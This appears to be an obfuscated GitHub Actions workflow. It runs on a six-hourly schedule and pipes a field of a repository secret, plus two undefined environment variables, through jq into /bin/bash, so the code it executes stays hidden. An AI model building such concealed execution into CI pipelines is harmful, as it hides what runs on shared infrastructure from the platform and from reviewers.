name: lingdaoshou4716
on:
  workflow_dispatch:
  schedule:
    - cron: '24 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lingdaoshou4716
        env:
          jlich4: ${{ secrets.jlich4 }}
        run: |
          echo $jlich4 | jq -r .fy5 | /bin/bash
          echo $uzxlr528 | jq -r .smly715 | /bin/bash
          echo $me118 | jq -r .nvf042 | /bin/bash

